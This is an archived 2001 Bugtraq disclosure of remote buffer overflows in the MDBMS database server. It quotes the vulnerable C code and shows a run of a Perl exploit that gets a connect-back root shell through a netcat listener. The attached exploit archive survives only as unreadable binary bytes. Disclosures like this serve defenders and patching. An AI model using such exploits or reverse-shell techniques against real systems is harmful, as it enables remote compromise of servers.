6618752 2001-06-12 21:47 +0200 /90 rader/ teleh0r - <teleh0r@digit-labs.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-14 00:08 av Brevbäraren
Extern mottagare: BUGTRAQ@securityfocus.com
Mottagare: Bugtraq (import) <17414>
Ärende: Remote buffer overflow in MDBMS.
------------------------------------------------------------
Dear bugtraq readers,
MDBMS is a SQL database server (currently) for UNIX systems.
Version 0.99b9 and below versions contain an exploitable
buffer overflow in the handling of the \s console command.
When a user passes large buffers to the server in the form
of multiple lines, these are appended to the end of each
other. A subsequent call to the \s command causes the
overflow.
Below is faulty code (from interface.cc):
void user::uprintf(char *s, ...)
{
char b[10000];
int len=strlen(outbuf), newlen;
va_list ap;
va_start(ap,s);
vsprintf(b,s,ap); <----
va_end(ap);
newlen=strlen(b);
while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
strcat(outbuf,b);
FD_SET(fd,&parent->wmask);
}
mu-b also found a buffer overflow in the "create database"
system. This was actually caused by a sprintf that generated
the name of the management variable. This has been fixed -
now table and database names can no longer be larger than
128 bytes.
Information about the overflows was sent to marty@hinttech.com.
He has now fixed the problems, and new versions of MDBMS can
be found at: http://www.hinttech.com/mdbms/
We would like to thank Marty for kind response and quick update.
Exploit example:
----------------
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
Usage: ./mdbms-pms.pl -t <hostname> -b <back>
-t <hostname> : hostname to test
-b <back> : connect back to ip
-p <port> : port (default: 2223)
-d <delay> : delay before timeout
-o <offset> : offset
-h : return to heap
[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return : 0x80cfe76 / using the heap ...
-> Sending payload: ...
-> * Successfully sent payload - good luck!
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
Exploit code attached.
Sincerely yours,
teleh0r and mu-b
--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
(6618752) /teleh0r - <teleh0r@digit-labs.org>/------
Bilaga (application/x-gzip) i text 6618753
6618753 2001-06-12 21:47 +0200 /41 rader/ teleh0r - <teleh0r@digit-labs.org>
Bilagans filnamn: "mdbms.tar.gz"
Importerad: 2001-06-14 00:08 av Brevbäraren
Extern mottagare: BUGTRAQ@securityfocus.com
Mottagare: Bugtraq (import) <17415>
Bilaga (text/plain) till text 6618752
Ärende: Bilaga (mdbms.tar.gz) till: Remote buffer overflow in MDBMS.
------------------------------------------------------------
·o&; ì;iwÛÆ®ýjþâÄ£
¤6[^nÒ$msn¶»}½×vu¸$ÖÉp±¥&¹¿ý.ò÷µÍ}KãHÌ0 ´ðEÚæË8ü¬ûÍ_rFß
ðI×ú§ø>êf¿?ûߦվa¿f:õ+O3;aì$²Ûð>÷ü鵨é_ÜÅ´ÞiÜ¢Óóúú£!à÷fÿfüyS¸ùú®ÿû÷ºyt?ìÆ< 4í>ûÈÞñEqö4ò8{¾änùQÈü½zöí«#vİýftvw"yÅ«ÄÍ3¦»MfZ³bûøÜH{þÌÏÚí¤(É `D²§ÈÓë0|BO¿Íglå¡|ÆLòi±Ë¹pv%ç~8cY4ãÙæB$~6g¼ít
.OîùY:fS?§ÿþ7ËóÄ)s Æ\»°Üv` 9bøÍíÍü²ï°c8<.E
XÂòS¶°á^Øfî»ç,Ê3Bïtn.Û®c»çí
w\FåË
k'g¶¤MËSÎ"÷g{,M a@ßó,³ñø(óöØnR}+;ãxì£ñ|«ÅNØÉ¬¹§iþéú!÷ôM}ØÊ¶>5ìÛ Ôìpöé|GáãÄ+ððc
GIVÁoÀ÷¾Ç{Uâ{7àG
?NÓÊü£ðç
Îí¸29áÁ½D
åáC±Þ&>ÌS{Æ'h{@³i ¶öØÃ8ñÃ%$
ðû'
-èøíñ4:é*y2[uB5ÏÀ3;`/1~a§¸Ûöö8âߨÁ}fZ¾¦`vÆbÊ%XPiþm2·ù·5½qºì~ôÄ)>,úØÝw;Æð#î%ئÞTàîÐ5j í =oÕbhMXóCÜN´§Ñi²Ò·-
míñ}ÖÝf;»°q2Øå´Ýó,ÇÝîååeMÝ!n4
ÚfÉå@çKÏ9]z(úgÏltÇ5Nü
(ÓåÎîéëÁwCà8ÓÍ8íO GÓÑæ\ ÜF©;§Kc wÅ(Ãvv'¸7
ÀýÀP#Ê nôÌ33¦ oW|N
+ù¨Î·8#Ä-ÎÀsrP6àzò~ïÂ'Çá=AW[)Æ3Bj ÞÍ_°;@ùSÃÀðÍ_±P!Ãl0Ø÷ÄÞgyÒ¥Ýú7f,ÃòÑáÆN§6÷2"ðãàã(M}ôÞYÄ$=|C¿N,ü0Í`o²hJ0 Ä·(-ÈÎ*¶Ó|m ÉÁ3ú3°2Ø_F!äK)BÚØÎÜy½ ñÃ(c6µÀ' ¢[Z4° G¢iÜ=íoàp9_±b9ȼÎ1(ÈKÈ5Èü
ãÞ ðeÖqÝ1Ø)]o²3PÂoÿäﶬ-pÇ?0˲z þ=CF
7ýå7ÒLùÂðäè5`Ç<O2Á!Àéli|®R¶~ôæéß·ÐânmÁxCBØÁ¿XÚ½ßíÎöØæG ñ
B¾éGÇÏÞüx>ñɵêö!$41BÆEèêJ§aC@S"yâyh¤`6îKÖeË(¡¸+ @ÓZwh ý·Ð(h1ÞI{-ÆÈSRy¡ïN§CIË|b<@~g^dÈ7°ZÔ=¤íUÙÞ546qlðÞM2¨C
4]°eìöÖ4rÂHÛì(w]ñ4Ç+åa¦F
5"¹{~Oh&æ«\,Ë`bÏ&v
z"qÿñ#ZÞx$Qfp¯T<fRú¦/ >÷5â·GHiBØMpGM0òáÍÕ6JF¿#ÈF}ül6DÄ; ú²¿ÏvìðØä$±¤_D<
æêa}"ªMRJh±*¨ÁøñDê¦Ëpû&]Ói©ëà@ 5S$b:å³ÃC\Ï](_RÃæç)¾¤°ú&áPÒÃ,6Sò©8 e?G/¾ÿ°õäå»WÓ0DúP³
>TúÜKMöIú%á
a>ãLÀlÒÁɱ«ÉÅ¿ùËÆß³-p¿ùrSFp_è
7àvÒ éWaí[¯.ý°g¡§ym·µÕ)(/Ni2À~5uJ[óàÚÅñìtý|ÔWt§amßn¢bgÙ¼YN>òD9r_r_JªÊÞ$¬|0>Á³Nép󬿿ª2è¨lbHÀy¬ÀW_}
ªN
É
ªQ_¥t{w^f-b(d©ÙdXÝ£µëRh&!ɸoUî±ê¯
°2ø¢ÉoV·®Úÿ=!×Ôùè౯*ñúë:.}¼®¾Gê4׬µkU¦.T·¦õBãå¨39=M׸ArPB5b\Ϥ&ùàèL¶Ê¸%±K7¬®[ÂØf¬ø¤pðÇï8áp-9Hón|Oà3 ïÎ*´\ßÊÜx«y§ùáQý¡ßÛï&/^ãLß=òª%G»5>KqÉa\_Ë]T ¥¨òljZ;cxÿ^ÿÁÚÛG¢4Àó9l³C±Úµ§³1uK<O3¨ÕÇjê$ìÇ5fû¨À
*åâºLóÇ7%²Çö)æÈ"89öWL"Gûbß*dq+Ï×ä:®0§Ô4Üo|égR ÿîúä×믽êõ'eý¾
'è?±Øõÿa¿Óûþ`PÖÿ#ëÿ£Þ×úÿ¹´g2©w¬L[&GÈBlvô/gg6${pµÝÍwÁªIÀ¯_ü,SÖ´£ý$«xîReCËeÙ"EÏÙ~TÂ**%2' qTïÀò{
ªw4
0ý],àiiÚÎ9p¤úÃò
OY ®iQxk¼aú¦ãx^? ¤-|¶ÁÅÚqD¹%¤ê·Ý¹a¶Ãà#åïs<óº6gË©Òã¨è¤VØÑ´oI4 jòý+ÐëÓ$ZÀ3@³]ÞqÝæXÓ."ߣõǹ,¸sÐß6L·Óé45LK⸷(<ÌÍÒ,¤Ùbôð1.ìIàCV%7ºÃMévÜJ)Ê^¤r4§¶ìR¤ý6\)Áà¨r&ÞØèâÑ#ü3ÃDêÿÙ©Íc»I/g"Wα%±ª¬];SÏÅß==?Ö§^ëal£U¶/åI2|!g·4¯lv5\TÊÖL/|°(gÃnp³^.ñÝðÂÕ»ybc]JC¦'H«#cra'T¬ñõÃÁz§þcDa^bO åÛÙAÁ¶ #DáÖápaæ N dií::ØÖÍÛ¦¡íà'¢V.ÖDe°Ö¨|õxKɸ;ïÕ¦úA¼ûÂé¹!=$w0³E* ÙrcÃR
ëÀ9jWB¦Rµ¯"^:waûâ{½<ð`ÿÜ
sÎ^á´ÈÉûÀ)ái ¹¼Ï}ȬòäÃaµÏåÙ/ílä±Ö^»4íD½+³Jåiü³MÖ©½þÖ´ß}ÄÖ*Gê;¨5Mf¡õ¡ÿe¤ìf¤·¨,tYÄuó7{½{¨g Û¡¡CãToØáêL üfÒ6QÇDiÈíù±+
n1®äü°·WVã6=Ã2¬W+tKË ZÀl,Õ;ëªÌÚuUdãï(új2>Ðì ®Ã -t
h;ôÍTÑLsg÷6½=ÐÖA»GöÂßc9íö"LÒXÃDN{e¹µ:ýÕ¶?Üé9ø¾P£Õ*ÿBú¶³â?÷ ~ä.O8¬~å>ëÓ$'
èì9ªÿ æwíÿ2FCc`PÿOÏ´¾ö}ë&ý¯7¦ü1n?ÿ¨n¥Ëàùodèëùï\Ým¦§×*; ä@§øn´)«üÙ2¸ I@,è %½.[-0í¬c"{òúÝ^I
;¨ì`%²`/ÃÇ]\b"HÂ?¿y·%X"=LáÀÅf}çß;a§2ºÌð%»e2Ilá»+pö)2K¢P£)Ó DÓgVÛ¡âÊ+¡¯#0×î<|LC-9 æÿB>Ad*Ñ ½&®¸&§8G *s âÓm$áBD]#º
$C <Yð°/£Ì]>,T©Tõ\È=aEG/Ô×BUP?&DïBÂë-rTPìÛÕ}êªöôjÔÌÓÝÖ:³ NÌuøÌ;ÈJ ± ØXÛ¸¯ªÓVXËÇ×jôäÚBõ·oß½9~39~ú¶©m@l<àβÅðm#ÎÓ¹ll ÷
¶¶AãZ¬Ê ·`ÉùÚ4¨
èÂÙØ4ÁXØ;@\øÎØdòúÝD¬+Úl Gÿ8z:qA¶ilÝ%Î$ÛØÄDOCA©ò;ò3¬sÈÍÔK¶ÿ·°nмÖèÁ¿þÈF\Ä»
À¬lö°wÀ4ry%DÐâPß/©·kh5ólR'÷³·.ÄËÎrm鴆 NPøÕáÈ%Q]PK
X¾yýúùÓR®B] itSä/ØF¡UMl *¼<¶
=ôÚÆ®Y#lÑ-×ëùÒ8,¢x|ãÃ^9S
A~¿éäA*VP;0lJÝYáй}yFàzï+b,D
|;£5ò*hwhYSkº&Þ&u
Ý Ó¼"5
·ýXCÇpL#ÈÁ¯ì§çGùaøÎlvŪÃÁÑ»~XÛIlwñ 5ªAn4©ÊIáÜNÎÀîÐkxVCÑixºÙ§K£/ú ©Ð}{ÆPGh!¬·J½ûp½óPêÍë
µ¢êë}Ro=\o;s©u®wJ½ñp½éPê}ë=b.Ôv¨ÝÝZìèÉgÏþ1yùæ)ÓÞ¬?stÖ¼Btôâ¬_
¾zrô÷ϲ²zuVD$Xi¸±§zòº=*çQõ¦%K¸Ô £ZJt¦ã³úy0ÎÉ^¦^ðëuz;O
àZüõfÛñ¯¶ò(üfÑn Ë:¦xkÝ<ëª×RÛ
´<Zø¿ñR¢k¢Þ'
ܳÖ6uA6ÓbÀXC®âb2t
.©*-¥^Q´m!¸&'£°G̽ÈÑÝ+¥;H¶§"?MsùÆò2,x3ĤIwEÓ«zÖÜGdKxAl5à 4;v±é÷
Sý`~õÑ_¶àr5Ñκ¬|®.ÙǶÓj·¨¥úEèÁ}c'XbâØÔ¨zØhÙUJX½ÈB3µVu©Î8!aAê$Ü>/Vqj7¬yëÔØj¶6³ ÀÈb4²mæ©"iµ©A
gÀ)^åâhQ²O½X¬E$ßµ|¼8®êMSönwZЯôÒ`å;æC±uýHüÒh|µ*f[m ½¤ ³öCöB2s[j»$³3eè´çôíiSÇn·7:ÙF#RF?¤Q/JѨãhØëd)Ó½Q9¹(?H!Ú
¡ã)Zsmój«+( ^¹8zù:êÆÕÈ#5ñ²_&`µØCÙgs[²9ñæõ<ÂYÎ÷Ê#§íÀy¶Ì½ri&åyWÖT5²Â®Sy
&'wÔu~æÞI'"¡¯ÂV5Ĭ·V5h~WÌ[8/½f£ÿ»K_¯[®µßæmçÏÿðÿÛôGôûÏe_ë¿_âºFÿÂ×?Võ-¯ÏÔ¾9úïFFð=kôµþû%.LÊJ}5¹WcôzñgõS½þÒ;p$hÈÇp¤)
Çéý`glÔ1[ÉÂ4d9²¼
LSò¹áÄhW~>,(ê-EézOÑÕnU¼¶«HvÝÔK´o'º©©?ÓPÄni(R/'Ú¢G¢§h.½AìCµ}è_Î}¡TµDÕc¿O8ÇL/~ÅÂ.ûþóì´ãqQéã¨ë¥ËÚmö@/D:¼÷xó(áþþJMàK,}@à é
£+ÅodIQpqKmçó¥ ,e«§w«(º¿à×`g¶('©úÀë7o7eß, oß¼;ÞÀåÇW?ýøòõQ@Þ|÷ÝÑóc #³øáåîhq¿ÆÜ¿PÎVA²¦ðmʹ<hì©Æ3ÈÓ1Ãe0<øö
Ã:d(üMBÊ¡{ZýðcÈãA'&ÚÙ¦½°gÍ8'Ó3¦òË
ùQ¬
°^´+ÊLXê±Õ ¾¹½òá*xÒSÂCøÀ<øÎÅ÷²ºUâÑ/f;T㿼/ñ^¾¨þgUæ¶Sâá»râùPÍ£Ä3ûò9ó¯Ï³Ä[¯Æ
$~jõq¯àJÙTå2k,½
Me½(_Uâ#]ìxÕùáó¾Y}V
Õå2¥9ÄüFj~£oÚ²pijµ_x\êv:-ÿÊbbE~µ_<7®X¨üUا¦~¤l5T]G\`·ÔB/òÈßOy,[!Kæ#[ò±v]ú`ðSIÂØyÂÉkûaåÿÕÎõõ´
ñçöSxLf¤¥Ú
Tû I{k
Ðh× -L¤ÓP¿û||¶Ó8h/÷{¨Äw±}öù|¾K+B´"Ræ-<$#Ñ\H»)'o¹ü½,~ÒAÝÖ~+ù¿U/ÚC×v»ë¡d
âOÝÎÙ¬\»ûl@Ú
%r¿äfH<Í!oi¸Íth¶i:v^ìl¿çåÇÈô¨/9²Ci´7Ò$
F_ ÓdÉ%4ȱ«ip8&á² O¸93ÁÐ Ù7ãÌ^;¯¡AU]ì":¸ãÊÂ7Ê9Ù1x<
âÇðè`^Ä4D>9|2<àÊ
:!]|ð¯UµUÖ¦ÆæòoÛÚÌ\C·N{8>EÀiÄ]%T~¡º[8ÔÝá!þÝv_°SÜêüoÀM:X«ÏêxüÃ<=&°y#ô~A¦7!¨´¿B^µcëkk
?àt¿®2,Ô`J¿]sæb±êõ*#áÍylax ºÿú#?6¬v°·Ç²=ñTÆ>=ìç¯fFí©ûUÏße¯$Ts½¤´=hgíagdà_½ürqáÅ®âw*vÓæf½ìÏÖÑNgÅ÷a5¼´Óçþ\3Ìiõ+ë¸ÖÙ'º+Ñcµ¬n~ß!'EuÚPÎ9z èL-¹éõ`X
²HÉÞq
ZCÙ£Ur0tèv×?ªü|g{w×8r¶ï>34÷Óϼ¼"%1õ ÅËjÄ©b1@k T»Ì6û·ûCv«§kÔY¢úøê8H6úy1¸íç^ºnK$TCl-È@À3w.aü¶dâJXO²n·57ûÎÆÏ
ÎÜÞÌÊ(;?ÞªÚû±ºÌ)rA©ÏÊ7´Ú¬ö¥bB4¦ó
ñÊÊ
(Ô?¯3&¹6qãrB·ûóòFüß[äËιr v®C¦DøÙ5|*yÎ22=\ilïSZrS¥1+±øúö
J8çoÚ°É&õJÎBÈTÀhy[}JIdý§Âñ(øV;o40¾kf=aÖ¶`;Ã]Òc&K{õá5drª
HËGO¢ðGjXÇÚ)S~
ÅÉÉ»cú¨tJMÆuæ¦;.ýßÎX
B¡P(
B¡P(
B¡P(
B¡P(
âø_0óÁ x
(6618753) /teleh0r - <teleh0r@digit-labs.org>/(Ombruten)